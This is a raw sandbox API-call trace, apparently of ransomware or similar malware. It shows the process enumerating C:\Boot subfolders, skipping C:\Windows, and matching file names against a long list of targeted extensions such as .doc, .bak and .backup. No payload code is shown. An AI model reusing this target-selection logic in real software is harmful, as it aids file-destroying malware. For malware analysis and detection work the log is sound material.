(lpString=".ini") returned 4 [0035.293] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0035.293] FindNextFileW (in: hFindFile=0x6f44f8, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0035.293] FindClose (in: hFindFile=0x6f44f8 | out: hFindFile=0x6f44f8) returned 1 [0035.293] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.293] FindNextFileW (in: hFindFile=0x6f34b0, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0035.293] FindClose (in: hFindFile=0x6f34b0 | out: hFindFile=0x6f34b0) returned 1 [0035.293] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39206e0 | out: hHeap=0x600000) returned 1 [0035.293] FindNextFileW (in: hFindFile=0x6f3470, lpFindFileData=0x351fd00 | out: lpFindFileData=0x351fd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0035.293] lstrlenW (lpString="C:\\Boot") returned 7 [0035.293] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Boot") returned 1 [0035.293] lstrlenW (lpString="Boot") returned 4 [0035.293] lstrcmpiW (lpString1="C:\\Windows", lpString2="Boot") returned 1 [0035.293] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39206e0 [0035.293] lstrlenW (lpString="C:\\Boot") returned 7 [0035.293] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f44b8 [0035.293] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.293] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0035.294] lstrlenW (lpString="BCD") returned 3 [0035.294] lstrlenW (lpString=".1cd") returned 4 [0035.294] lstrcmpiW (lpString1=".1cd", lpString2="") returned 1 [0035.294] lstrlenW (lpString=".3ds") returned 4 [0035.294] lstrcmpiW (lpString1=".3ds", lpString2="") returned 1 [0035.294] lstrlenW (lpString=".3fr") returned 4 [0035.294] lstrcmpiW (lpString1=".3fr", lpString2="") returned 1 [0035.294] lstrlenW (lpString=".3g2") returned 4 [0035.294] lstrcmpiW (lpString1=".3g2", lpString2="") returned 1 [0035.294] lstrlenW (lpString=".3gp") returned 4 [0035.294] lstrcmpiW (lpString1=".3gp", lpString2="") returned 1 [0035.294] lstrlenW (lpString=".7z") returned 3 [0035.294] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0035.294] lstrlenW (lpString=".accda") returned 6 [0035.294] lstrcmpiW (lpString1=".accda", lpString2="") returned 1 [0035.294] lstrlenW (lpString=".accdb") returned 6 [0035.294] lstrcmpiW (lpString1=".accdb", lpString2="") returned 1 [0035.294] lstrlenW (lpString=".accdc") returned 6 [0035.294] lstrcmpiW (lpString1=".accdc", lpString2="") returned 1 [0035.294] lstrlenW (lpString=".accde") returned 6 [0035.294] lstrcmpiW (lpString1=".accde", lpString2="") returned 1 [0035.294] lstrlenW (lpString=".accdt") returned 6 [0035.294] lstrcmpiW (lpString1=".accdt", lpString2="") returned 1 [0035.294] lstrlenW (lpString=".accdw") returned 6 [0035.294] lstrcmpiW (lpString1=".accdw", lpString2="") returned 1 [0035.294] lstrlenW (lpString=".adb") returned 4 [0035.294] lstrcmpiW (lpString1=".adb", lpString2="") returned 1 [0035.294] lstrlenW (lpString=".adp") returned 4 [0035.294] lstrcmpiW (lpString1=".adp", lpString2="") returned 1 [0035.294] lstrlenW (lpString=".ai") returned 3 [0035.294] lstrcmpiW (lpString1=".ai", lpString2="BCD") returned -1 [0035.294] lstrlenW (lpString=".ai3") returned 4 [0035.294] lstrcmpiW (lpString1=".ai3", lpString2="") returned 1 [0035.294] lstrlenW (lpString=".ai4") returned 4 [0035.294] lstrcmpiW (lpString1=".ai4", lpString2="") returned 1 [0035.294] lstrlenW (lpString=".ai5") returned 4 [0035.294] lstrcmpiW (lpString1=".ai5", lpString2="") returned 1 [0035.294] lstrlenW (lpString=".ai6") returned 4 [0035.294] lstrcmpiW (lpString1=".ai6", lpString2="") returned 1 [0035.294] lstrlenW (lpString=".ai7") returned 4 [0035.295] lstrcmpiW (lpString1=".ai7", lpString2="") returned 1 [0035.295] lstrlenW (lpString=".ai8") returned 4 [0035.295] lstrcmpiW (lpString1=".ai8", lpString2="") returned 1 [0035.295] lstrlenW (lpString=".anim") returned 5 [0035.295] lstrcmpiW (lpString1=".anim", lpString2="") returned 1 [0035.295] lstrlenW (lpString=".arw") returned 4 [0035.295] lstrcmpiW (lpString1=".arw", lpString2="") returned 1 [0035.295] lstrlenW (lpString=".as") returned 3 [0035.295] lstrcmpiW (lpString1=".as", lpString2="BCD") returned -1 [0035.295] lstrlenW (lpString=".asa") returned 4 [0035.295] lstrcmpiW (lpString1=".asa", lpString2="") returned 1 [0035.295] lstrlenW (lpString=".asc") returned 4 [0035.295] lstrcmpiW (lpString1=".asc", lpString2="") returned 1 [0035.295] lstrlenW (lpString=".ascx") returned 5 [0035.295] lstrcmpiW (lpString1=".ascx", lpString2="") returned 1 [0035.295] lstrlenW (lpString=".asm") returned 4 [0035.295] lstrcmpiW (lpString1=".asm", lpString2="") returned 1 [0035.295] lstrlenW (lpString=".asmx") returned 5 [0035.295] lstrcmpiW (lpString1=".asmx", lpString2="") returned 1 [0035.295] lstrlenW (lpString=".asp") returned 4 [0035.295] lstrcmpiW (lpString1=".asp", lpString2="") returned 1 [0035.295] lstrlenW (lpString=".aspx") returned 5 [0035.295] lstrcmpiW (lpString1=".aspx", lpString2="") returned 1 [0035.295] lstrlenW (lpString=".asr") returned 4 [0035.295] lstrcmpiW (lpString1=".asr", lpString2="") returned 1 [0035.295] lstrlenW (lpString=".asx") returned 4 [0035.295] lstrcmpiW (lpString1=".asx", lpString2="") returned 1 [0035.295] lstrlenW (lpString=".avi") returned 4 [0035.295] lstrcmpiW (lpString1=".avi", lpString2="") returned 1 [0035.295] lstrlenW (lpString=".avs") returned 4 [0035.295] lstrcmpiW (lpString1=".avs", lpString2="") returned 1 [0035.295] lstrlenW (lpString=".backup") returned 7 [0035.295] lstrcmpiW (lpString1=".backup", lpString2="") returned 1 [0035.295] lstrlenW (lpString=".bak") returned 4 [0035.296] lstrcmpiW (lpString1=".bak", lpString2="") returned 1 [0035.296] lstrlenW (lpString=".bay") returned 4 [0035.296] lstrcmpiW (lpString1=".bay", lpString2="") returned 1 [0035.296] lstrlenW (lpString=".bd") returned 3 [0035.296] lstrcmpiW (lpString1=".bd", lpString2="BCD") returned -1 [0035.296] lstrlenW (lpString=".bin") returned 4 [0035.296] lstrcmpiW (lpString1=".bin", lpString2="") returned 1 [0035.296] lstrlenW (lpString=".bmp") returned 4 [0035.296] lstrcmpiW (lpString1=".bmp", lpString2="") returned 1 [0035.296] lstrlenW (lpString=".bz2") returned 4 [0035.296] lstrcmpiW (lpString1=".bz2", lpString2="") returned 1 [0035.296] lstrlenW (lpString=".c") returned 2 [0035.296] lstrcmpiW (lpString1=".c", lpString2="CD") returned -1 [0035.296] lstrlenW (lpString=".cdr") returned 4 [0035.296] lstrcmpiW (lpString1=".cdr", lpString2="") returned 1 [0035.296] lstrlenW (lpString=".cer") returned 4 [0035.296] lstrcmpiW (lpString1=".cer", lpString2="") returned 1 [0035.296] lstrlenW (lpString=".cf") returned 3 [0035.296] lstrcmpiW (lpString1=".cf", lpString2="BCD") returned -1 [0035.296] lstrlenW (lpString=".cfc") returned 4 [0035.296] lstrcmpiW (lpString1=".cfc", lpString2="") returned 1 [0035.296] lstrlenW (lpString=".cfm") returned 4 [0035.296] lstrcmpiW (lpString1=".cfm", lpString2="") returned 1 [0035.296] lstrlenW (lpString=".cfml") returned 5 [0035.296] lstrcmpiW (lpString1=".cfml", lpString2="") returned 1 [0035.296] lstrlenW (lpString=".cfu") returned 4 [0035.296] lstrcmpiW (lpString1=".cfu", lpString2="") returned 1 [0035.296] lstrlenW (lpString=".chm") returned 4 [0035.296] lstrcmpiW (lpString1=".chm", lpString2="") returned 1 [0035.296] lstrlenW (lpString=".cin") returned 4 [0035.296] lstrcmpiW (lpString1=".cin", lpString2="") returned 1 [0035.296] lstrlenW (lpString=".class") returned 6 [0035.296] lstrcmpiW (lpString1=".class", lpString2="") returned 1 [0035.296] lstrlenW (lpString=".clx") returned 4 [0035.296] lstrcmpiW (lpString1=".clx", lpString2="") returned 1 [0035.296] lstrlenW (lpString=".config") returned 7 [0035.296] lstrcmpiW (lpString1=".config", lpString2="") returned 1 [0035.296] lstrlenW (lpString=".cpp") returned 4 [0035.296] lstrcmpiW (lpString1=".cpp", lpString2="") returned 1 [0035.297] lstrlenW (lpString=".cr2") returned 4 [0035.297] lstrcmpiW (lpString1=".cr2", lpString2="") returned 1 [0035.297] lstrlenW (lpString=".crt") returned 4 [0035.297] lstrcmpiW (lpString1=".crt", lpString2="") returned 1 [0035.297] lstrlenW (lpString=".crw") returned 4 [0035.297] lstrcmpiW (lpString1=".crw", lpString2="") returned 1 [0035.297] lstrlenW (lpString=".cs") returned 3 [0035.297] lstrcmpiW (lpString1=".cs", lpString2="BCD") returned -1 [0035.297] lstrlenW (lpString=".css") returned 4 [0035.297] lstrcmpiW (lpString1=".css", lpString2="") returned 1 [0035.297] lstrlenW (lpString=".csv") returned 4 [0035.297] lstrcmpiW (lpString1=".csv", lpString2="") returned 1 [0035.297] lstrlenW (lpString=".cub") returned 4 [0035.297] lstrcmpiW (lpString1=".cub", lpString2="") returned 1 [0035.297] lstrlenW (lpString=".dae") returned 4 [0035.297] lstrcmpiW (lpString1=".dae", lpString2="") returned 1 [0035.297] lstrlenW (lpString=".dat") returned 4 [0035.297] lstrcmpiW (lpString1=".dat", lpString2="") returned 1 [0035.297] lstrlenW (lpString=".db") returned 3 [0035.297] lstrcmpiW (lpString1=".db", lpString2="BCD") returned -1 [0035.297] lstrlenW (lpString=".dbf") returned 4 [0035.297] lstrcmpiW (lpString1=".dbf", lpString2="") returned 1 [0035.297] lstrlenW (lpString=".dbx") returned 4 [0035.297] lstrcmpiW (lpString1=".dbx", lpString2="") returned 1 [0035.297] lstrlenW (lpString=".dc3") returned 4 [0035.297] lstrcmpiW (lpString1=".dc3", lpString2="") returned 1 [0035.297] lstrlenW (lpString=".dcm") returned 4 [0035.297] lstrcmpiW (lpString1=".dcm", lpString2="") returned 1 [0035.297] lstrlenW (lpString=".dcr") returned 4 [0035.297] lstrcmpiW (lpString1=".dcr", lpString2="") returned 1 [0035.297] lstrlenW (lpString=".der") returned 4 [0035.297] lstrcmpiW (lpString1=".der", lpString2="") returned 1 [0035.297] lstrlenW (lpString=".dib") returned 4 [0035.297] lstrcmpiW (lpString1=".dib", lpString2="") returned 1 [0035.297] lstrlenW (lpString=".dic") returned 4 [0035.297] lstrcmpiW (lpString1=".dic", lpString2="") returned 1 [0035.297] lstrlenW (lpString=".dif") returned 4 [0035.297] lstrcmpiW (lpString1=".dif", lpString2="") returned 1 [0035.297] lstrlenW (lpString=".divx") returned 5 [0035.297] lstrcmpiW (lpString1=".divx", lpString2="") returned 1 [0035.297] lstrlenW (lpString=".djvu") returned 5 [0035.297] lstrcmpiW (lpString1=".djvu", lpString2="") returned 1 [0035.298] lstrlenW (lpString=".dng") returned 4 [0035.298] lstrcmpiW (lpString1=".dng", lpString2="") returned 1 [0035.298] lstrlenW (lpString=".doc") returned 4 [0035.298] lstrcmpiW (lpString1=".doc", lpString2="") returned 1 [0035.298] lstrlenW (lpString=".docm") returned 5 [0035.298] lstrcmpiW (lpString1=".docm", lpString2="") returned 1 [0035.298] lstrlenW (lpString=".docx") returned 5 [0035.298] lstrcmpiW (lpString1=".docx", lpString2="") returned 1 [0035.298] lstrlenW (lpString=".dot") returned 4 [0035.298] lstrcmpiW (lpString1=".dot", lpString2="") returned 1 [0035.298] lstrlenW (lpString=".dotm") returned 5 [0035.298] lstrcmpiW (lpString1=".dotm", lpString2="") returned 1 [0035.298] lstrlenW (lpString=".dotx") returned 5 [0035.298] lstrcmpiW (lpString1=".dotx", lpString2="") returned 1 [0035.298] lstrlenW (lpString=".dpx") returned 4 [0035.298] lstrcmpiW (lpString1=".dpx", lpString2="") returned 1 [0035.298] lstrlenW (lpString=".dqy") returned 4 [0035.298] lstrcmpiW (lpString1=".dqy", lpString2="") returned 1 [0035.298] lstrlenW (lpString=".dsn") returned 4 [0035.298] lstrcmpiW (lpString1=".dsn", lpString2="") returned 1 [0035.298] lstrlenW (lpString=".dt") returned 3 [0035.298] lstrcmpiW (lpString1=".dt", lpString2="BCD") returned -1 [0035.298] lstrlenW (lpString=".dtd") returned 4 [0035.298] lstrcmpiW (lpString1=".dtd", lpString2="") returned 1 [0035.298] lstrlenW (lpString=".dwg") returned 4 [0035.298] lstrcmpiW (lpString1=".dwg", lpString2="") returned 1 [0035.298] lstrlenW (lpString=".dwt") returned 4 [0035.298] lstrcmpiW (lpString1=".dwt", lpString2="") returned 1 [0035.298] lstrlenW (lpString=".dx") returned 3 [0035.298] lstrcmpiW (lpString1=".dx", lpString2="BCD") returned -1 [0035.298] lstrlenW (lpString=".dxf") returned 4 [0035.298] lstrcmpiW (lpString1=".dxf", lpString2="") returned 1 [0035.298] lstrlenW (lpString=".edml") returned 5 [0035.298] lstrcmpiW (lpString1=".edml", lpString2="") returned 1 [0035.298] lstrlenW (lpString=".efd") returned 4 [0035.298] lstrcmpiW (lpString1=".efd", lpString2="") returned 1 [0035.298] lstrlenW (lpString=".elf") returned 4 [0035.298] lstrcmpiW (lpString1=".elf", lpString2="") returned 1 [0035.298] lstrlenW (lpString=".emf") returned 4 [0035.298] lstrcmpiW (lpString1=".emf", lpString2="") returned 1 [0035.298] lstrlenW (lpString=".emz") returned 4 [0035.299] lstrcmpiW (lpString1=".emz", lpString2="") returned 1 [0035.299] lstrlenW (lpString=".epf") returned 4 [0035.299] lstrcmpiW (lpString1=".epf", lpString2="") returned 1 [0035.299] lstrlenW (lpString=".eps") returned 4 [0035.299] lstrcmpiW (lpString1=".eps", lpString2="") returned 1 [0035.299] lstrlenW (lpString=".epsf") returned 5 [0035.299] lstrcmpiW (lpString1=".epsf", lpString2="") returned 1 [0035.299] lstrlenW (lpString=".epsp") returned 5 [0035.299] lstrcmpiW (lpString1=".epsp", lpString2="") returned 1 [0035.299] lstrlenW (lpString=".erf") returned 4 [0035.299] lstrcmpiW (lpString1=".erf", lpString2="") returned 1 [0035.299] lstrlenW (lpString=".exr") returned 4 [0035.299] lstrcmpiW (lpString1=".exr", lpString2="") returned 1 [0035.299] lstrlenW (lpString=".f4v") returned 4 [0035.299] lstrcmpiW (lpString1=".f4v", lpString2="") returned 1 [0035.299] lstrlenW (lpString=".fido") returned 5 [0035.299] lstrcmpiW (lpString1=".fido", lpString2="") returned 1 [0035.299] lstrlenW (lpString=".flm") returned 4 [0035.299] lstrcmpiW (lpString1=".flm", lpString2="") returned 1 [0035.299] lstrlenW (lpString=".flv") returned 4 [0035.299] lstrcmpiW (lpString1=".flv", lpString2="") returned 1 [0035.299] lstrlenW (lpString=".frm") returned 4 [0035.299] lstrcmpiW (lpString1=".frm", lpString2="") returned 1 [0035.299] lstrlenW (lpString=".fxg") returned 4 [0035.299] lstrcmpiW (lpString1=".fxg", lpString2="") returned 1 [0035.299] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.299] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.300] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.300] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.300] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.300] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.300] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0035.301] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.301] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.301] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.301] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.301] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.301] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.301] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0035.301] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.301] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.302] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.302] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.302] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.302] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.302] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0035.302] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39306e8 [0035.302] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5500 [0035.303] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.303] FindNextFileW (in: hFindFile=0x6f5500, lpFindFileData=0x351f808 | out: lpFindFileData=0x351f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.303] FindClose (in: hFindFile=0x6f5500 | out: hFindFile=0x6f5500) returned 1 [0035.303] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39306e8 | out: hHeap=0x600000) returned 1 [0035.303] FindNextFileW (in: hFindFile=0x6f44b8, lpFindFileData=0x351fa84 | out: lpFindFileData=0x351fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0035.303] 